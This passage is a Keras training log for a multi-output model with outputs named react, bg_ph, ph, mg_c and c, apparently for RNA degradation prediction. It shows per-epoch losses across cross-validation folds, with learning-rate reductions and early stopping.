120/120 - 7s - loss: 4.0692 - output_react_loss: 0.4418 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6387 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5326 - val_output_c_loss: 0.5269 Epoch 00051: early stopping FOLD: 2 Epoch 1/70 120/120 - 9s - loss: 8.9128 - output_react_loss: 0.9383 - output_bg_ph_loss: 1.1704 - output_ph_loss: 1.3152 - output_mg_c_loss: 1.1295 - output_c_loss: 1.1212 - val_loss: 6.5853 - val_output_react_loss: 0.7624 - val_output_bg_ph_loss: 0.9432 - val_output_ph_loss: 0.8395 - val_output_mg_c_loss: 0.8012 - val_output_c_loss: 0.7321 Epoch 2/70 120/120 - 7s - loss: 7.5912 - output_react_loss: 0.8057 - output_bg_ph_loss: 0.9756 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9677 - output_c_loss: 0.9707 - val_loss: 5.9750 - val_output_react_loss: 0.6882 - val_output_bg_ph_loss: 0.8614 - val_output_ph_loss: 0.7744 - val_output_mg_c_loss: 0.7194 - val_output_c_loss: 0.6625 Epoch 3/70 120/120 - 7s - loss: 7.1064 - output_react_loss: 0.7623 - output_bg_ph_loss: 0.8993 - output_ph_loss: 1.0778 - output_mg_c_loss: 0.8766 - output_c_loss: 0.9522 - val_loss: 5.4677 - val_output_react_loss: 0.6513 - val_output_bg_ph_loss: 0.7812 - val_output_ph_loss: 0.7253 - val_output_mg_c_loss: 0.6417 - val_output_c_loss: 0.5941 Epoch 4/70 120/120 - 7s - loss: 6.7508 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8445 - output_ph_loss: 1.0186 - output_mg_c_loss: 0.8359 - output_c_loss: 0.8961 - val_loss: 5.1992 - val_output_react_loss: 0.6109 - val_output_bg_ph_loss: 0.7467 - val_output_ph_loss: 0.6903 - val_output_mg_c_loss: 0.6108 - val_output_c_loss: 0.5722 Epoch 5/70 120/120 - 7s - loss: 6.5375 - output_react_loss: 0.7160 - output_bg_ph_loss: 0.8198 - output_ph_loss: 0.9891 - output_mg_c_loss: 0.8013 - output_c_loss: 0.8744 - val_loss: 4.9895 - val_output_react_loss: 0.5965 - val_output_bg_ph_loss: 0.7124 - val_output_ph_loss: 0.6590 - val_output_mg_c_loss: 0.5759 - val_output_c_loss: 0.5609 Epoch 6/70 120/120 - 7s - loss: 6.2897 - output_react_loss: 0.6944 - output_bg_ph_loss: 0.7863 - output_ph_loss: 0.9586 - output_mg_c_loss: 0.7666 - output_c_loss: 0.8363 - val_loss: 4.8275 - val_output_react_loss: 0.5699 - val_output_bg_ph_loss: 0.6906 - val_output_ph_loss: 0.6425 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5416 Epoch 7/70 120/120 - 7s - loss: 6.1039 - output_react_loss: 0.6757 - output_bg_ph_loss: 0.7549 - output_ph_loss: 0.9339 - output_mg_c_loss: 0.7382 - output_c_loss: 0.8322 - val_loss: 4.8011 - val_output_react_loss: 0.5680 - val_output_bg_ph_loss: 0.6876 - val_output_ph_loss: 0.6410 - val_output_mg_c_loss: 0.5562 - val_output_c_loss: 0.5364 Epoch 8/70 120/120 - 7s - loss: 6.0208 - output_react_loss: 0.6756 - output_bg_ph_loss: 0.7429 - output_ph_loss: 0.9175 - output_mg_c_loss: 0.7260 - output_c_loss: 0.8144 - val_loss: 4.7141 - val_output_react_loss: 0.5520 - val_output_bg_ph_loss: 0.6756 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5310 Epoch 9/70 120/120 - 7s - loss: 5.6994 - output_react_loss: 0.6325 - output_bg_ph_loss: 0.7093 - output_ph_loss: 0.8825 - output_mg_c_loss: 0.6814 - output_c_loss: 0.7703 - val_loss: 4.6370 - val_output_react_loss: 0.5421 - val_output_bg_ph_loss: 0.6677 - val_output_ph_loss: 0.6186 - val_output_mg_c_loss: 0.5388 - val_output_c_loss: 0.5210 Epoch 10/70 120/120 - 7s - loss: 5.6689 - output_react_loss: 0.6333 - output_bg_ph_loss: 0.7009 - 
output_ph_loss: 0.8634 - output_mg_c_loss: 0.6764 - output_c_loss: 0.7843 - val_loss: 4.6090 - val_output_react_loss: 0.5307 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6181 - val_output_mg_c_loss: 0.5431 - val_output_c_loss: 0.5205 Epoch 11/70 120/120 - 7s - loss: 5.6520 - output_react_loss: 0.6270 - output_bg_ph_loss: 0.6931 - output_ph_loss: 0.8810 - output_mg_c_loss: 0.6780 - output_c_loss: 0.7747 - val_loss: 4.6214 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6075 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5131 Epoch 12/70 120/120 - 8s - loss: 5.4352 - output_react_loss: 0.6135 - output_bg_ph_loss: 0.6598 - output_ph_loss: 0.8373 - output_mg_c_loss: 0.6389 - output_c_loss: 0.7736 - val_loss: 4.5804 - val_output_react_loss: 0.5245 - val_output_bg_ph_loss: 0.6611 - val_output_ph_loss: 0.6115 - val_output_mg_c_loss: 0.5368 - val_output_c_loss: 0.5240 Epoch 13/70 120/120 - 7s - loss: 5.1948 - output_react_loss: 0.5789 - output_bg_ph_loss: 0.6361 - output_ph_loss: 0.8005 - output_mg_c_loss: 0.6193 - output_c_loss: 0.7260 - val_loss: 4.6597 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6780 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5512 - val_output_c_loss: 0.5173 Epoch 14/70 120/120 - 7s - loss: 5.2999 - output_react_loss: 0.5952 - output_bg_ph_loss: 0.6389 - output_ph_loss: 0.8436 - output_mg_c_loss: 0.6209 - output_c_loss: 0.7465 - val_loss: 4.5068 - val_output_react_loss: 0.5207 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6002 - val_output_mg_c_loss: 0.5245 - val_output_c_loss: 0.5112 Epoch 15/70 120/120 - 7s - loss: 5.1306 - output_react_loss: 0.5741 - output_bg_ph_loss: 0.6185 - output_ph_loss: 0.8090 - output_mg_c_loss: 0.6039 - output_c_loss: 0.7288 - val_loss: 4.5211 - val_output_react_loss: 0.5159 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6016 - val_output_mg_c_loss: 0.5362 - val_output_c_loss: 0.5062 Epoch 16/70 120/120 - 7s - loss: 5.1908 - output_react_loss: 0.5787 - output_bg_ph_loss: 0.6171 - output_ph_loss: 0.8378 - output_mg_c_loss: 0.6046 - output_c_loss: 0.7522 - val_loss: 4.4677 - val_output_react_loss: 0.5082 - val_output_bg_ph_loss: 0.6455 - val_output_ph_loss: 0.5972 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5101 Epoch 17/70 120/120 - 7s - loss: 4.8559 - output_react_loss: 0.5465 - output_bg_ph_loss: 0.5882 - output_ph_loss: 0.7376 - output_mg_c_loss: 0.5721 - output_c_loss: 0.7048 - val_loss: 4.5045 - val_output_react_loss: 0.5143 - val_output_bg_ph_loss: 0.6495 - val_output_ph_loss: 0.6043 - val_output_mg_c_loss: 0.5306 - val_output_c_loss: 0.5113 Epoch 18/70 120/120 - 7s - loss: 5.0255 - output_react_loss: 0.5594 - output_bg_ph_loss: 0.5926 - output_ph_loss: 0.8123 - output_mg_c_loss: 0.5886 - output_c_loss: 0.7321 - val_loss: 4.4435 - val_output_react_loss: 0.5030 - val_output_bg_ph_loss: 0.6454 - val_output_ph_loss: 0.5924 - val_output_mg_c_loss: 0.5227 - val_output_c_loss: 0.5090 Epoch 19/70 120/120 - 7s - loss: 4.7977 - output_react_loss: 0.5330 - output_bg_ph_loss: 0.5742 - output_ph_loss: 0.7592 - output_mg_c_loss: 0.5608 - output_c_loss: 0.7026 - val_loss: 4.4516 - val_output_react_loss: 0.5021 - val_output_bg_ph_loss: 0.6497 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5071 Epoch 20/70 120/120 - 8s - loss: 4.8366 - output_react_loss: 0.5339 - output_bg_ph_loss: 0.5719 - output_ph_loss: 0.7718 - output_mg_c_loss: 0.5682 - output_c_loss: 0.7168 - val_loss: 4.5308 - val_output_react_loss: 0.5117 
- val_output_bg_ph_loss: 0.6645 - val_output_ph_loss: 0.6015 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5107 Epoch 21/70 120/120 - 7s - loss: 4.7086 - output_react_loss: 0.5245 - output_bg_ph_loss: 0.5567 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5511 - output_c_loss: 0.6912 - val_loss: 4.4813 - val_output_react_loss: 0.5113 - val_output_bg_ph_loss: 0.6490 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5102 Epoch 22/70 120/120 - 7s - loss: 4.6421 - output_react_loss: 0.5127 - output_bg_ph_loss: 0.5502 - output_ph_loss: 0.7402 - output_mg_c_loss: 0.5398 - output_c_loss: 0.6963 - val_loss: 4.4557 - val_output_react_loss: 0.5040 - val_output_bg_ph_loss: 0.6519 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5232 - val_output_c_loss: 0.5055 Epoch 23/70 120/120 - 7s - loss: 4.6514 - output_react_loss: 0.5118 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7576 - output_mg_c_loss: 0.5392 - output_c_loss: 0.6970 - val_loss: 4.4421 - val_output_react_loss: 0.5016 - val_output_bg_ph_loss: 0.6492 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5212 - val_output_c_loss: 0.5054 Epoch 24/70 120/120 - 7s - loss: 4.6099 - output_react_loss: 0.5030 - output_bg_ph_loss: 0.5386 - output_ph_loss: 0.7466 - output_mg_c_loss: 0.5384 - output_c_loss: 0.7033 - val_loss: 4.4646 - val_output_react_loss: 0.5075 - val_output_bg_ph_loss: 0.6508 - val_output_ph_loss: 0.5950 - val_output_mg_c_loss: 0.5218 - val_output_c_loss: 0.5094 Epoch 25/70 120/120 - 7s - loss: 4.6612 - output_react_loss: 0.5116 - output_bg_ph_loss: 0.5410 - output_ph_loss: 0.7671 - output_mg_c_loss: 0.5411 - output_c_loss: 0.7068 - val_loss: 4.4891 - val_output_react_loss: 0.5045 - val_output_bg_ph_loss: 0.6496 - val_output_ph_loss: 0.5954 - val_output_mg_c_loss: 0.5386 - val_output_c_loss: 0.5082 Epoch 26/70 120/120 - 7s - loss: 4.4395 - output_react_loss: 0.4891 - output_bg_ph_loss: 0.5246 - output_ph_loss: 0.7109 - output_mg_c_loss: 0.5179 - output_c_loss: 0.6654 - val_loss: 4.4417 - val_output_react_loss: 0.5011 - val_output_bg_ph_loss: 0.6438 - val_output_ph_loss: 0.5984 - val_output_mg_c_loss: 0.5237 - val_output_c_loss: 0.5061 Epoch 27/70 120/120 - 7s - loss: 4.5181 - output_react_loss: 0.4952 - output_bg_ph_loss: 0.5245 - output_ph_loss: 0.7437 - output_mg_c_loss: 0.5240 - output_c_loss: 0.6870 - val_loss: 4.4796 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6477 - val_output_ph_loss: 0.6034 - val_output_mg_c_loss: 0.5297 - val_output_c_loss: 0.5165 Epoch 28/70 120/120 - 7s - loss: 4.2343 - output_react_loss: 0.4702 - output_bg_ph_loss: 0.4963 - output_ph_loss: 0.6728 - output_mg_c_loss: 0.4927 - output_c_loss: 0.6430 - val_loss: 4.4593 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5952 - val_output_mg_c_loss: 0.5253 - val_output_c_loss: 0.5161 Epoch 29/70 120/120 - 7s - loss: 4.4013 - output_react_loss: 0.4723 - output_bg_ph_loss: 0.5051 - output_ph_loss: 0.7193 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6734 - val_loss: 4.4265 - val_output_react_loss: 0.4955 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5036 Epoch 30/70 120/120 - 7s - loss: 4.3896 - output_react_loss: 0.4825 - output_bg_ph_loss: 0.5062 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.5048 - output_c_loss: 0.6827 - val_loss: 4.4442 - val_output_react_loss: 0.5034 - val_output_bg_ph_loss: 0.6440 - val_output_ph_loss: 0.5901 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5084 
Epoch 31/70 120/120 - 7s - loss: 4.4621 - output_react_loss: 0.4806 - output_bg_ph_loss: 0.5130 - output_ph_loss: 0.7569 - output_mg_c_loss: 0.5145 - output_c_loss: 0.6892 - val_loss: 4.4552 - val_output_react_loss: 0.5004 - val_output_bg_ph_loss: 0.6472 - val_output_ph_loss: 0.5983 - val_output_mg_c_loss: 0.5229 - val_output_c_loss: 0.5160 Epoch 32/70 120/120 - 7s - loss: 4.2475 - output_react_loss: 0.4605 - output_bg_ph_loss: 0.4863 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4949 - output_c_loss: 0.6682 - val_loss: 4.4139 - val_output_react_loss: 0.4989 - val_output_bg_ph_loss: 0.6431 - val_output_ph_loss: 0.5878 - val_output_mg_c_loss: 0.5178 - val_output_c_loss: 0.5063 Epoch 33/70 120/120 - 7s - loss: 4.1801 - output_react_loss: 0.4557 - output_bg_ph_loss: 0.4810 - output_ph_loss: 0.6817 - output_mg_c_loss: 0.4887 - output_c_loss: 0.6477 - val_loss: 4.4204 - val_output_react_loss: 0.5017 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5185 - val_output_c_loss: 0.5075 Epoch 34/70 120/120 - 7s - loss: 4.2968 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4961 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.5014 - output_c_loss: 0.6743 - val_loss: 4.4172 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6441 - val_output_ph_loss: 0.5912 - val_output_mg_c_loss: 0.5202 - val_output_c_loss: 0.5060 Epoch 35/70 120/120 - 7s - loss: 4.1495 - output_react_loss: 0.4533 - output_bg_ph_loss: 0.4722 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4812 - output_c_loss: 0.6492 - val_loss: 4.4591 - val_output_react_loss: 0.5022 - val_output_bg_ph_loss: 0.6493 - val_output_ph_loss: 0.5941 - val_output_mg_c_loss: 0.5252 - val_output_c_loss: 0.5116 Epoch 36/70 120/120 - 8s - loss: 4.0763 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4645 - output_ph_loss: 0.6734 - output_mg_c_loss: 0.4782 - output_c_loss: 0.6381 - val_loss: 4.4036 - val_output_react_loss: 0.4951 - val_output_bg_ph_loss: 0.6432 - val_output_ph_loss: 0.5894 - val_output_mg_c_loss: 0.5171 - val_output_c_loss: 0.5035 Epoch 37/70 120/120 - 7s - loss: 4.1241 - output_react_loss: 0.4450 - output_bg_ph_loss: 0.4707 - output_ph_loss: 0.6836 - output_mg_c_loss: 0.4806 - output_c_loss: 0.6479 - val_loss: 4.4011 - val_output_react_loss: 0.4963 - val_output_bg_ph_loss: 0.6378 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5173 - val_output_c_loss: 0.5087 Epoch 38/70 120/120 - 7s - loss: 4.1484 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.7004 - output_mg_c_loss: 0.4808 - output_c_loss: 0.6545 - val_loss: 4.4141 - val_output_react_loss: 0.4966 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5210 - val_output_c_loss: 0.5046 Epoch 39/70 120/120 - 7s - loss: 4.2517 - output_react_loss: 0.4578 - output_bg_ph_loss: 0.4794 - output_ph_loss: 0.7088 - output_mg_c_loss: 0.4968 - output_c_loss: 0.6750 - val_loss: 4.4511 - val_output_react_loss: 0.4998 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6013 - val_output_mg_c_loss: 0.5233 - val_output_c_loss: 0.5109 Epoch 40/70 120/120 - 7s - loss: 4.0662 - output_react_loss: 0.4374 - output_bg_ph_loss: 0.4607 - output_ph_loss: 0.6695 - output_mg_c_loss: 0.4729 - output_c_loss: 0.6544 - val_loss: 4.4141 - val_output_react_loss: 0.5001 - val_output_bg_ph_loss: 0.6404 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5056 Epoch 41/70 120/120 - 7s - loss: 3.8941 - output_react_loss: 0.4138 - output_bg_ph_loss: 0.4496 - output_ph_loss: 0.6444 - 
output_mg_c_loss: 0.4510 - output_c_loss: 0.6209 - val_loss: 4.4168 - val_output_react_loss: 0.4977 - val_output_bg_ph_loss: 0.6417 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5181 - val_output_c_loss: 0.5070 Epoch 42/70 Epoch 00042: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.1502 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4868 - output_c_loss: 0.6625 - val_loss: 4.4021 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6418 - val_output_ph_loss: 0.5860 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5040 Epoch 43/70 120/120 - 7s - loss: 3.8376 - output_react_loss: 0.4166 - output_bg_ph_loss: 0.4320 - output_ph_loss: 0.6376 - output_mg_c_loss: 0.4413 - output_c_loss: 0.6202 - val_loss: 4.3635 - val_output_react_loss: 0.4917 - val_output_bg_ph_loss: 0.6368 - val_output_ph_loss: 0.5831 - val_output_mg_c_loss: 0.5129 - val_output_c_loss: 0.4978 Epoch 44/70 120/120 - 7s - loss: 3.7882 - output_react_loss: 0.4002 - output_bg_ph_loss: 0.4222 - output_ph_loss: 0.6415 - output_mg_c_loss: 0.4426 - output_c_loss: 0.6167 - val_loss: 4.3476 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6351 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5106 - val_output_c_loss: 0.4974 Epoch 45/70 120/120 - 7s - loss: 3.7885 - output_react_loss: 0.4035 - output_bg_ph_loss: 0.4196 - output_ph_loss: 0.6485 - output_mg_c_loss: 0.4403 - output_c_loss: 0.6132 - val_loss: 4.3480 - val_output_react_loss: 0.4893 - val_output_bg_ph_loss: 0.6345 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5105 - val_output_c_loss: 0.4981 Epoch 46/70 120/120 - 7s - loss: 3.9172 - output_react_loss: 0.4131 - output_bg_ph_loss: 0.4344 - output_ph_loss: 0.6645 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6555 - val_loss: 4.3521 - val_output_react_loss: 0.4891 - val_output_bg_ph_loss: 0.6358 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981 Epoch 47/70 120/120 - 7s - loss: 3.8257 - output_react_loss: 0.4088 - output_bg_ph_loss: 0.4219 - output_ph_loss: 0.6486 - output_mg_c_loss: 0.4438 - output_c_loss: 0.6281 - val_loss: 4.3550 - val_output_react_loss: 0.4909 - val_output_bg_ph_loss: 0.6359 - val_output_ph_loss: 0.5818 - val_output_mg_c_loss: 0.5110 - val_output_c_loss: 0.4977 Epoch 48/70 120/120 - 7s - loss: 3.6280 - output_react_loss: 0.3876 - output_bg_ph_loss: 0.4024 - output_ph_loss: 0.6122 - output_mg_c_loss: 0.4184 - output_c_loss: 0.5991 - val_loss: 4.3525 - val_output_react_loss: 0.4897 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5109 - val_output_c_loss: 0.4990 Epoch 49/70 Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 
120/120 - 7s - loss: 3.6680 - output_react_loss: 0.3882 - output_bg_ph_loss: 0.4083 - output_ph_loss: 0.6171 - output_mg_c_loss: 0.4273 - output_c_loss: 0.6033 - val_loss: 4.3544 - val_output_react_loss: 0.4894 - val_output_bg_ph_loss: 0.6365 - val_output_ph_loss: 0.5815 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4988 Epoch 50/70 120/120 - 7s - loss: 3.8273 - output_react_loss: 0.4043 - output_bg_ph_loss: 0.4246 - output_ph_loss: 0.6552 - output_mg_c_loss: 0.4440 - output_c_loss: 0.6263 - val_loss: 4.3520 - val_output_react_loss: 0.4888 - val_output_bg_ph_loss: 0.6361 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981 Epoch 51/70 120/120 - 7s - loss: 3.7274 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4092 - output_ph_loss: 0.6250 - output_mg_c_loss: 0.4293 - output_c_loss: 0.6293 - val_loss: 4.3505 - val_output_react_loss: 0.4884 - val_output_bg_ph_loss: 0.6360 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5112 - val_output_c_loss: 0.4977 Epoch 52/70 120/120 - 7s - loss: 3.6490 - output_react_loss: 0.3857 - output_bg_ph_loss: 0.4046 - output_ph_loss: 0.6147 - output_mg_c_loss: 0.4234 - output_c_loss: 0.6068 - val_loss: 4.3496 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6357 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5108 - val_output_c_loss: 0.4978 Epoch 53/70 120/120 - 7s - loss: 3.7603 - output_react_loss: 0.3971 - output_bg_ph_loss: 0.4124 - output_ph_loss: 0.6570 - output_mg_c_loss: 0.4288 - output_c_loss: 0.6266 - val_loss: 4.3507 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4982 Epoch 54/70 Restoring model weights from the end of the best epoch. Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 
120/120 - 7s - loss: 3.7694 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4149 - output_ph_loss: 0.6489 - output_mg_c_loss: 0.4337 - output_c_loss: 0.6269 - val_loss: 4.3503 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4981 Epoch 00054: early stopping FOLD: 3 Epoch 1/70 120/120 - 9s - loss: 8.8878 - output_react_loss: 0.9465 - output_bg_ph_loss: 1.1514 - output_ph_loss: 1.3084 - output_mg_c_loss: 1.1391 - output_c_loss: 1.1053 - val_loss: 6.8064 - val_output_react_loss: 0.7579 - val_output_bg_ph_loss: 0.9719 - val_output_ph_loss: 0.8874 - val_output_mg_c_loss: 0.8577 - val_output_c_loss: 0.7440 Epoch 2/70 120/120 - 7s - loss: 7.5866 - output_react_loss: 0.8103 - output_bg_ph_loss: 0.9564 - output_ph_loss: 1.1300 - output_mg_c_loss: 0.9663 - output_c_loss: 0.9906 - val_loss: 5.9556 - val_output_react_loss: 0.6788 - val_output_bg_ph_loss: 0.8620 - val_output_ph_loss: 0.7972 - val_output_mg_c_loss: 0.7089 - val_output_c_loss: 0.6591 Epoch 3/70 120/120 - 7s - loss: 7.1029 - output_react_loss: 0.7670 - output_bg_ph_loss: 0.8975 - output_ph_loss: 1.0765 - output_mg_c_loss: 0.8802 - output_c_loss: 0.9372 - val_loss: 5.5450 - val_output_react_loss: 0.6525 - val_output_bg_ph_loss: 0.7868 - val_output_ph_loss: 0.7563 - val_output_mg_c_loss: 0.6494 - val_output_c_loss: 0.6112 Epoch 4/70 120/120 - 7s - loss: 6.6969 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8420 - output_ph_loss: 1.0159 - output_mg_c_loss: 0.8264 - output_c_loss: 0.8691 - val_loss: 5.2467 - val_output_react_loss: 0.6092 - val_output_bg_ph_loss: 0.7460 - val_output_ph_loss: 0.7138 - val_output_mg_c_loss: 0.6214 - val_output_c_loss: 0.5797 Epoch 5/70 120/120 - 7s - loss: 6.4476 - output_react_loss: 0.7109 - output_bg_ph_loss: 0.8136 - output_ph_loss: 0.9755 - output_mg_c_loss: 0.7868 - output_c_loss: 0.8494 - val_loss: 5.0943 - val_output_react_loss: 0.5976 - val_output_bg_ph_loss: 0.7243 - val_output_ph_loss: 0.7027 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5641 Epoch 6/70 120/120 - 7s - loss: 6.3095 - output_react_loss: 0.7026 - output_bg_ph_loss: 0.7853 - output_ph_loss: 0.9685 - output_mg_c_loss: 0.7654 - output_c_loss: 0.8344 - val_loss: 4.9502 - val_output_react_loss: 0.5770 - val_output_bg_ph_loss: 0.7029 - val_output_ph_loss: 0.6805 - val_output_mg_c_loss: 0.5747 - val_output_c_loss: 0.5605 Epoch 7/70 120/120 - 7s - loss: 6.0598 - output_react_loss: 0.6725 - output_bg_ph_loss: 0.7548 - output_ph_loss: 0.9201 - output_mg_c_loss: 0.7363 - output_c_loss: 0.8123 - val_loss: 4.8857 - val_output_react_loss: 0.5688 - val_output_bg_ph_loss: 0.6976 - val_output_ph_loss: 0.6561 - val_output_mg_c_loss: 0.5791 - val_output_c_loss: 0.5388 Epoch 8/70 120/120 - 7s - loss: 6.0025 - output_react_loss: 0.6656 - output_bg_ph_loss: 0.7450 - output_ph_loss: 0.9193 - output_mg_c_loss: 0.7267 - output_c_loss: 0.8085 - val_loss: 4.8275 - val_output_react_loss: 0.5589 - val_output_bg_ph_loss: 0.6901 - val_output_ph_loss: 0.6632 - val_output_mg_c_loss: 0.5609 - val_output_c_loss: 0.5444 Epoch 9/70 120/120 - 7s - loss: 5.8000 - output_react_loss: 0.6429 - output_bg_ph_loss: 0.7186 - output_ph_loss: 0.8900 - output_mg_c_loss: 0.6959 - output_c_loss: 0.7954 - val_loss: 4.8379 - val_output_react_loss: 0.5601 - val_output_bg_ph_loss: 0.6958 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5629 - val_output_c_loss: 0.5385 Epoch 10/70 120/120 - 7s - loss: 5.7426 - output_react_loss: 0.6346 - output_bg_ph_loss: 0.7066 - 
output_ph_loss: 0.8856 - output_mg_c_loss: 0.6923 - output_c_loss: 0.7900 - val_loss: 4.7528 - val_output_react_loss: 0.5533 - val_output_bg_ph_loss: 0.6816 - val_output_ph_loss: 0.6431 - val_output_mg_c_loss: 0.5523 - val_output_c_loss: 0.5353 Epoch 11/70 120/120 - 7s - loss: 5.5888 - output_react_loss: 0.6175 - output_bg_ph_loss: 0.6880 - output_ph_loss: 0.8729 - output_mg_c_loss: 0.6694 - output_c_loss: 0.7663 - val_loss: 4.6962 - val_output_react_loss: 0.5468 - val_output_bg_ph_loss: 0.6738 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5505 - val_output_c_loss: 0.5243 Epoch 12/70 120/120 - 7s - loss: 5.4090 - output_react_loss: 0.6094 - output_bg_ph_loss: 0.6587 - output_ph_loss: 0.8390 - output_mg_c_loss: 0.6427 - output_c_loss: 0.7485 - val_loss: 4.6933 - val_output_react_loss: 0.5430 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5538 - val_output_c_loss: 0.5320 Epoch 13/70 120/120 - 7s - loss: 5.2612 - output_react_loss: 0.5896 - output_bg_ph_loss: 0.6432 - output_ph_loss: 0.8160 - output_mg_c_loss: 0.6258 - output_c_loss: 0.7279 - val_loss: 4.7046 - val_output_react_loss: 0.5389 - val_output_bg_ph_loss: 0.6817 - val_output_ph_loss: 0.6311 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5237 Epoch 14/70 120/120 - 7s - loss: 5.2187 - output_react_loss: 0.5794 - output_bg_ph_loss: 0.6374 - output_ph_loss: 0.8238 - output_mg_c_loss: 0.6175 - output_c_loss: 0.7265 - val_loss: 4.6621 - val_output_react_loss: 0.5476 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6268 - val_output_mg_c_loss: 0.5409 - val_output_c_loss: 0.5285 Epoch 15/70 120/120 - 7s - loss: 5.3190 - output_react_loss: 0.5846 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8447 - output_mg_c_loss: 0.6308 - output_c_loss: 0.7639 - val_loss: 4.6176 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6204 - val_output_mg_c_loss: 0.5372 - val_output_c_loss: 0.5199 Epoch 16/70 120/120 - 7s - loss: 5.0473 - output_react_loss: 0.5641 - output_bg_ph_loss: 0.6095 - output_ph_loss: 0.8032 - output_mg_c_loss: 0.5915 - output_c_loss: 0.7138 - val_loss: 4.6430 - val_output_react_loss: 0.5349 - val_output_bg_ph_loss: 0.6725 - val_output_ph_loss: 0.6229 - val_output_mg_c_loss: 0.5424 - val_output_c_loss: 0.5205 Epoch 17/70 120/120 - 7s - loss: 4.9326 - output_react_loss: 0.5489 - output_bg_ph_loss: 0.5868 - output_ph_loss: 0.7831 - output_mg_c_loss: 0.5786 - output_c_loss: 0.7209 - val_loss: 4.5794 - val_output_react_loss: 0.5290 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6149 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5161 Epoch 18/70 120/120 - 7s - loss: 4.9355 - output_react_loss: 0.5483 - output_bg_ph_loss: 0.5927 - 